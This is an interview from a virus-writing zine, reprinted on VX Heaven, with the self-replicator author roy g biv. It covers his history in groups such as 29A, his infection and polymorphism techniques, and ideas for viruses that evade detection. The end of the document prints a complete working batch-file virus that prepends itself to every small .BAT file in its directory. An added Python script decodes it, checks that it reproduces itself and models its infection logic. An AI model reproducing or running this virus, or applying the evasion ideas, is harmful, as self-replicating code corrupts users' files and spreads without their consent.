
VX Heaven


Interview with roy g biv

hh86, SPTH
Valhalla #4
November 2013


roy g biv started writing viruses in the 1990s and is still an active coder of self-replicators. He was a member of 29A and has written many viruses with novel and unexpected techniques, many of them featured in security magazines.

You can reach him via [email protected]

The interview was done in two sessions via email in September/October 2013.

Have fun :)

Hey roy g biv, thanks a lot for agreeing to this interview! First, can you give us a description of yourself please. How old are you, where were you born, and where do you live now? What's your favorite music? etc...

Hello SPTH and hh86. I am 34 but I really stopped counting when I reached 30. I am from a country near the top of Africa, but I have lived in many places. After some trouble in one of those places, I moved to Iran. That became a different trouble but there it is.

I don't listen to any music. I prefer the silence.

Could you tell us about a usual day of roy g biv? :)

There is no usual day for me. I try to make each day different so that I do not become predictable in where I go and what I do.

What's your favorite movie and why do you like it? What has been the worst movie you've ever seen?

I don't watch any movies.

What is your favorite literature and who is your favorite author? In many of your codes, you have a short quote from "Danny Hillis" about a butterfly - what is this about?

I don't read any books. All of my information comes from the network, when I can connect to it. The quote is about the Butterfly Effect, but I like to think of it as my search for a place where I can change something. Maybe what I write will be used by many people (like the TLS technique).

OK, you don't listen to music, you don't watch movies, you don't read any books. What else do you do with your 24 hours a day :)

Just surviving, thinking, working. It's not a simple thing to do here.

In some forum you mentioned a robbery at your house - can you tell us something about it?

One day, thieves stole everything from my room. It looked like no-one lived there anymore. It happens a lot in that area. They bring a truck and take all of the furniture.

You wrote in some texts that you wrote your first virus in 1992. Can you please tell us when and where you first heard about viruses, and why you found them interesting? How did you write the first one, did you have some sources or documents from other virus writers?

In 1992, Computer Virus Developments Quarterly was released, and some CDs of viruses became available. Before that, BBSes with virus source code were available. Prototype began with the source code to Diamond to make his Bad Seed virus, and I developed the code further.

When did you first have contact with virus writers, and how did you get this contact? Of course, today you just type "virus" into Google and you find VX Heaven, but back in those days I guess it was different :)

The contact was by mail. We would write letters to each other and send floppy disks.

You were sending letters and floppies via old-school post? :-o Never heard that before, I thought those people in the early days were paranoid and would definitely not share their postal addresses?

They were boxes at the post office. No home addresses there.

From 1992 to 1995, you wrote several codes, many of them under the group "defjam". Can you tell us a bit about this group, and about the other two members, Prototype and RT Fishel?

The group was really just two people writing PoCs for DOS.

RT Fishel wrote only one thing ever, which was a virus that stored its code in XMS and had a little swap routine in low memory. Anti-virus memory scanners could not find it because they did not scan the XMS.

Prototype was a good coder for DOS, he had advanced ideas about stealth but he never got the chance to implement them.

Did you have much contact with the vxers from that time? Did you have contact with Dark Avenger or Dark Angel or those other cool people?

No, I never had any contact with them. I think that they had retired before I started.

Between 1995 and 2001, you were gone. What did you do in those years, and what made you come back and start a second career of coding awesome self-replicators?

I had to rest and heal, and in that time the world changed from 16-bit to 32-bit. When I felt better, it was time to challenge myself again.

You had many, many kick-ass viruses in 29a#6, and joined the 29a team in 2002/2003. Can you tell us a bit about the time in this legendary group? Did you have much contact with the other members? Did you plan codes together or talk a lot about ideas and projects?

The group had a great reputation for producing new works, but internally it was like a shell with nothing inside. We would talk sometimes about what people were doing, and review the submissions for the zine, but no-one worked together on anything.

In 2008, 29a was officially retired. What happened at the end? What was the problem, and who decided that it would officially go offline?

Everyone left and VirusBuster called the end. No-one talked to each other, someone was sharing code with outsiders, and there was no trust. There was a server where we could log in and post messages, but suddenly access was denied and there was no discussion about it. I don't want to talk about names.

You have written so many great codes, can you give us a short description of your favorite ones?

Shrug (2001) - this was a direct-action virus that infected PE files (EXE and DLL) without looking at the suffix. It was the first virus to use the TLS callback method to run the code before the entrypoint. It automatically selected the correct text-encoding method (ANSI for Windows 9x or Unicode for Windows NT+). If the relocations were at the end of the file, then the virus would move the relocations down and insert itself into the space. The virus also added random amounts of garbage to the end of the file to interfere with scanners that look at the end of the file. It was my first virus for 32-bit Windows. You never forget your first one.

Junkmail (2002) - this was my second attempt at a super Windows virus. It was EfishNC with an SMTP engine so it could send mail. It was the first virus that would send e-mail using polymorphic SMTP headers. For that, I had the help of RT Fishel who came out of retirement just for that project. The subject and message body were variable. The text was all compressed to save space and also to make it hard to know what it could say. It knew all of the vulnerable IFrame types (MS01-020). It could send in .BAT, OLE2, or PE formats. The .BAT part was polymorphic, too. RT Fishel wrote an executable-ASCII base64 decoder that used no dictionary! That was 2002, and I think that some scanners still cannot detect it. I spent much time implementing every idea that I had while still being fully compliant with the RFC.

Heaven (2011) - this was a direct-action virus that infected PE files (EXE and DLL) without looking at the suffix. There is nothing special about the infection method because it just changed the entrypoint directly. The special thing about the code was that it jumped from 32-bit mode to 64-bit mode on 64-bit systems. The power of the 64-bit world in a 32-bit loader.

Polymer (2011) - a truly polymorphic Batch virus. I knew that it could be done.

Recently you have been very busy coding many, many first-of-their-kind self-replicators for new languages (for my "Language-Infection-Project" :) ). You hit more than 20 languages (so far) for the first time, just in the first 9 months of 2013 :-o Tell us what you like about touching new languages. What was your favorite language that you have infected recently? What did you learn when you coded self-replicators for so many different languages? How do you decide which language you want to infect next? What would be your three favorite victims in the future?

I like the idea of being first. The Language Infection Project allows me to do that many times. :)

Algol is the best that I have seen so far. It was a really superior language compared to some languages of today, even though it was written in 1968.

My idea was to use a single technique and apply it to all of the languages. It is most interesting to see how differently that technique must be applied in the different languages.

To pick a language to target, I just look at the list and choose the first one. If I find that I cannot understand it quickly (maybe in one hour), then I move to the next one, and repeat until I succeed. For languages like Perl and Python and Lua, I studied them for the first time and then infected them all in under one hour. They are very easy to learn. For a language like APL, even if I understand how it works, it can still take days to write something that works. I have tried several times to make the virus for Q language, but with no success so far.

I think that the really fun ones would be RPG, ActionScript, and PL/I. I hope to touch those in the next weeks.

Which of the codes that you have written was the most difficult one? Which one are you most proud of?

In the past years, the Itanium virus was very difficult to write. When I look at it just now, I don't even understand it anymore. In this recent time, the APL virus was very hard for me, even though it's only 19 lines long. The difficult things can change over time.

I am not proud of any of the viruses, but of the techniques. I am happy to see that the TLS technique is used by many people, that SEH (soon must be VEH) for common code exit is very useful to make clean code, and that 32-bit files can jump into the 64-bit world.

When you released the first infector for Win64 files, there was quite some media echo. What did you think about that? Did you get a lot of comments concerning your code?

I was surprised at the reaction but I don't remember any interesting contact from that time.

For many of your viruses, a lot of research on file formats, operating-system secrets etc. was required. Why do you prefer to release your findings as a virus writer rather than as a "reverse engineer"? Wouldn't that make your life easier?

To describe a technique by itself does not answer the question "how is it useful?", but to make a virus that uses it shows how it can be used, and we all benefit from that.

You released W32.Relock.B in valhalla#3, an updated version of your virtual-code technique for Windows 7. Some researchers said this technique was not possible on Win7. What did they miss, and how did you prove them wrong?

They said that the relocation types that I use were not supported anymore. I proved them wrong by still using those types. :)

On the evening when valhalla#2 was released, you sent a mail 15 minutes before the release. It was a preview version of your OpenGL code (the full version was finally released in valhalla#3). Why did you decide to submit an unfinished preview version for the first time?

:) Because I wanted to be first. For five years, I wanted to finish that code and at any time, someone might have done it before me. I did not want that to happen.

What is your opinion on code optimization? How much time do you spend on it?

I think that the optimisation is good, because it makes the code look "cleaner", but I cannot spend too much time on it because I am not very good at it. The master of code optimisation was Super/29A. He was really super.

What do you think about self-mutation of code? You wrote some very complex polymorphic viruses (for instance EfishNC), what did you learn there? Then there is metamorphism (only a few viruses can do that). What do you think about that technique? Could you imagine some other mutation techniques?

I learned that polymorphism is easy, and I have not achieved metamorphism at all so far. I wonder how much mutation is needed to be called metamorphic? For Polymer virus, if I swapped the order of the terms in the "if" blocks would that be enough? The body is mutated greatly already. To go beyond the simple changes like that requires so much code and details that I would be silent for a long time and work on nothing else. I do not know if that can be done. Of course, if I could do that, it would be great. Metamorphism is such a powerful technique that I would be very happy to master it. For other mutation techniques, can there be anything else? A mutation must be applied to either the body or its decryptor. What is left? Oh, what about a virus that mutates its environment so that it can run? :) Yes, something else must run first to achieve that, but it is not necessarily the virus. I don't know how to do that but it seems like an interesting idea.

What do you think about self-learning codes? How could this be done? What could a code learn, and what would be the advantage?

A virus can learn which machines are protected more than others. If the virus has a way to communicate, and then the communication stops, the receiving code might decide that the virus was discovered and so not try to infect that machine anymore. A virus can learn which directories cannot be written, so they should be avoided in case someone is watching for attempts to access them.

A virus can learn about the user activity and might want to scan the network during times of high network activity so that it might not be noticed. A virus can learn which files a user accesses most and then make those files depend on the virus being present.

These are just some quick ideas. I should think more on these. It is a very interesting topic for sure.

What do you think about codes written for the purpose of stealing money, creating botnets etc.? Unfortunately that has been a big business for many years. What is your opinion on the techniques of those codes - for example their mutation or spreading techniques? Are they high quality and do you find them interesting, or is it only boring stuff?

I hate the idea that people make money from this. It destroys the scene for us since we are all considered to be criminals for this reason. Even worse is that their ideas are all poor or old. They make encryption routines that a child could break and their "stealth" is like elephants running through the room.

Have you ever gotten a job offer due to your virus coding projects? Like from security companies, anti-virus companies, secret services?

No, none of those. I rarely get any e-mail in the first place, and mostly it is spam.

Do you have contact with people who work in data security?

No, the only people that I contact are you (SPTH and hh86) and now Promix a bit for his E-ZINE.

Do you know the work of academic researchers such as Eric Filiol and Mark Stamp, and what do you think about that?

I know who they are but I have not read their works.

What are your favorite viruses/worms of all time, and why?

Hybris is my favourite virus ever. The use of plug-ins was really smart.

Which techniques that have been developed since the mid 80s have been the most influential for virus writing and creating self-replicators?

I don't know of a technique since the mid 80s. The quine technique that I find to be so powerful for touching new languages - this was done in the 60s.

Let's come to my favorite topic, the future :) What do you think self-replicators will look like in the short term, like 5 years? In 15 years? And in the long term - 50 years?

I wonder if they will be so different to now. The code is the code, and the OS API does not change much, so we will have our PoCs like always. The file formats will change but we will still infect them. Maybe I lack enough imagination to look ahead that far.

Imagine a nice ghost comes to you and offers you three wishes. What would they be? :)

Better health, longer life, and enough money to go somewhere safe. I imagine the things that I could code without interruption.

Thanks a lot for your time! Feel free to fill the rest of the document with whatever you want.

I found a compiler for .bat, so... :)

@REM QUINE - ROY G BIV 19/09/13
@ECHO OFF
SETLOCAL ENABLEDELAYEDEXPANSION
SET A=4052454D205155494E45202D20524F592047204249562031392F30392F31330A404543484F204F46460A5345544C4F43414C20454E41424C4544454C41594544455850414E53494F4E0A53455420413D0A53455420423D205222232452522728292A2B2C2D2E2F303132333435363738393A3B523D523F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D525F606162636465666768696A6B6C6D6E6F707172737475767778797A7B527D7E0A464F52202F4C2025254120494E2028302C322C3135313629444F2043414C4C3A45202525410A464F522025254120494E20282A2E42415429444F2049462025257E5A41204C53532036303030302043414C4C3A49202525410A454E444C4F43414C0A404543484F204F4E0A40474F544F3A4B0A3A450A49462025313D3D3136302053455420463D2146212541250A534554202F4120473D307821413A7E25312C32210A534554202F4120483D472D33320A4946202547253D3D313020280A53455420463D2146215E0A0A29454C5345204946202548253D3D31202853455420463D2146215E5E210A29454C5345204946202548253D3D35202853455420463D21462125250A29454C5345204946202548253D3D36202853455420463D2146215E260A29454C5345204946202548253D3D3238202853455420463D2146215E3C0A29454C5345204946202548253D3D3330202853455420463D2146215E3E0A29454C5345204946202548253D3D3632202853455420463D2146215E5E5E5E0A29454C5345204946202548253D3D3932202853455420463D2146215E7C0A29454C53452053455420463D21462121423A7E2548252C31210A474F544F3A454F460A3A490A464F52202F462022544F4B454E533D2A222025254220494E2028253129444F20280A534554204A3D2525420A49462022214A3A7E352C352122204E455120225155494E452220280A52454E20253120520A4543484F202146213E25310A5459504520523E3E25310A44454C20520A290A474F544F3A454F460A290A3A4B0A
SET B= R"#$RR'()*+,-./0123456789:;R=R?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]R_`abcdefghijklmnopqrstuvwxyz{R}~
FOR /L %%A IN (0,2,1516)DO CALL:E %%A
FOR %%A IN (*.BAT)DO IF %%~ZA LSS 60000 CALL:I %%A
ENDLOCAL
@ECHO ON
@GOTO:K
:E
IF %1==160 SET F=!F!%A%
SET /A G=0x!A:~%1,2!
SET /A H=G-32
IF %G%==10 (
SET F=!F!^

)ELSE IF %H%==1 (SET F=!F!^^!
)ELSE IF %H%==5 (SET F=!F!%%
)ELSE IF %H%==6 (SET F=!F!^&
)ELSE IF %H%==28 (SET F=!F!^<
)ELSE IF %H%==30 (SET F=!F!^>
)ELSE IF %H%==62 (SET F=!F!^^^^
)ELSE IF %H%==92 (SET F=!F!^|
)ELSE SET F=!F!!B:~%H%,1!
GOTO:EOF
:I
FOR /F "TOKENS=*" %%B IN (%1)DO (
SET J=%%B
IF "!J:~5,5!" NEQ "QUINE" (
REN %1 R
ECHO !F!>%1
TYPE R>>%1
DEL R
)
GOTO:EOF
)
:K
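The following is an added consistency check on the batch quine printed above, written by the editor; it is not roy g biv's code and is not part of the interview. It replays the :E decode loop in Python, checks that the three numbers the quine relies on (the SET A= payload, the FOR /L upper bound, and the 160 splice offset) agree with the payload as printed, and models the :I guard that decides which *.BAT files get the quine prepended. The victim file text is constructed for the test. The batch ECHO escaping of ^ % & < > | ! is skipped because it exists only to make ECHO emit those characters, and line endings are treated as LF rather than the CRLF cmd.exe would write; both are simplifications.

```python
"""Consistency check for the batch quine above (editor's added example)."""
import re

# The SET A= payload, copied from the listing above (1518 hex digits).
PAYLOAD = (
    "4052454D205155494E45202D20524F592047204249562031392F30392F31330A40454348"
    "4F204F46460A5345544C4F43414C20454E41424C4544454C41594544455850414E53494F4E0A53"
    "455420413D0A53455420423D205222232452522728292A2B2C2D2E2F303132333435363738393A"
    "3B523D523F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D525F6061"
    "62636465666768696A6B6C6D6E6F707172737475767778797A7B527D7E0A464F52202F4C202525"
    "4120494E2028302C322C3135313629444F2043414C4C3A45202525410A464F522025254120494E"
    "20282A2E42415429444F2049462025257E5A41204C53532036303030302043414C4C3A49202525"
    "410A454E444C4F43414C0A404543484F204F4E0A40474F544F3A4B0A3A450A49462025313D3D31"
    "36302053455420463D2146212541250A534554202F4120473D307821413A7E25312C32210A5345"
    "54202F4120483D472D33320A4946202547253D3D313020280A53455420463D2146215E0A0A2945"
    "4C5345204946202548253D3D31202853455420463D2146215E5E210A29454C5345204946202548"
    "253D3D35202853455420463D21462125250A29454C5345204946202548253D3D36202853455420"
    "463D2146215E260A29454C5345204946202548253D3D3238202853455420463D2146215E3C0A29"
    "454C5345204946202548253D3D3330202853455420463D2146215E3E0A29454C53452049462025"
    "48253D3D3632202853455420463D2146215E5E5E5E0A29454C5345204946202548253D3D393220"
    "2853455420463D2146215E7C0A29454C53452053455420463D21462121423A7E2548252C31210A"
    "474F544F3A454F460A3A490A464F52202F462022544F4B454E533D2A222025254220494E202825"
    "3129444F20280A534554204A3D2525420A49462022214A3A7E352C352122204E45512022515549"
    "4E452220280A52454E20253120520A4543484F202146213E25310A5459504520523E3E25310A44"
    "454C20520A290A474F544F3A454F460A290A3A4B0A"
)

MARKER = "QUINE"      # :I compares !J:~5,5! of the first line against this
SIZE_LIMIT = 60000    # :I only touches files where %%~ZA LSS 60000


def decode_source(payload: str) -> str:
    """Replay the FOR /L ... CALL:E loop: every hex pair becomes one character,
    and when the loop index reaches the splice offset named in the source
    (IF %1==160) the raw payload text itself is appended. That splice is what
    makes the output contain its own encoding. The batch escapes for ^ % & < >
    | ! are not modelled; they only exist so ECHO writes those bytes."""
    splice_at = int(re.search(r"IF %1==(\d+) SET F=!F!%A%",
                              bytes.fromhex(payload).decode("ascii")).group(1))
    out = []
    for i in range(0, len(payload), 2):
        if i == splice_at:
            out.append(payload)
        out.append(chr(int(payload[i:i + 2], 16)))
    return "".join(out)


def quine_parameters(source: str):
    """Pull the three numbers the quine depends on out of its own text."""
    a = re.search(r"^SET A=([0-9A-F]*)$", source, re.M).group(1)
    bound = int(re.search(r"^FOR /L %%A IN \(0,2,(\d+)\)", source, re.M).group(1))
    splice = int(re.search(r"^IF %1==(\d+) SET F=!F!%A%", source, re.M).group(1))
    return a, bound, splice


def is_consistent_quine(payload: str) -> bool:
    """The decoded source must carry this very payload, its loop bound must
    cover every hex digit, its splice offset must point right after 'SET A=',
    and its first line must carry the marker :I looks for."""
    source = decode_source(payload)
    a, bound, splice = quine_parameters(source)
    prefix_end = source.index("SET A=") + len("SET A=")
    return (a == payload
            and bound + 2 == len(payload)
            and splice == 2 * prefix_end
            and first_for_f_line(source)[5:10] == MARKER)


def first_for_f_line(text: str) -> str:
    """FOR /F default behaviour: skip blank lines and lines starting with ';'."""
    for line in text.splitlines():
        if line and not line.startswith(";"):
            return line
    return ""


def would_infect(victim: str) -> bool:
    """Mirror the :I guard: under the size limit and marker absent at column 5
    of the first line FOR /F reads. An empty file never enters the loop body."""
    if len(victim.encode("utf-8")) >= SIZE_LIMIT:
        return False
    line = first_for_f_line(victim)
    if not line:
        return False
    return line[5:10] != MARKER


def infect(victim: str, payload: str = PAYLOAD) -> str:
    """Prepender: REN %1 R / ECHO !F!>%1 / TYPE R>>%1 puts the decoded quine
    in front of the original contents (LF line endings assumed here)."""
    if not would_infect(victim):
        return victim
    return decode_source(payload) + victim


if __name__ == "__main__":
    print("payload length:", len(PAYLOAD))
    print("consistent quine:", is_consistent_quine(PAYLOAD))
    print("parameters:", quine_parameters(decode_source(PAYLOAD))[1:])
```

Because the check reads the splice offset and loop bound out of the decoded text rather than hard-coding them, a payload whose author miscounted either number fails the check even though the hex itself decodes cleanly; an already infected file fails would_infect because its first line carries QUINE at column 5.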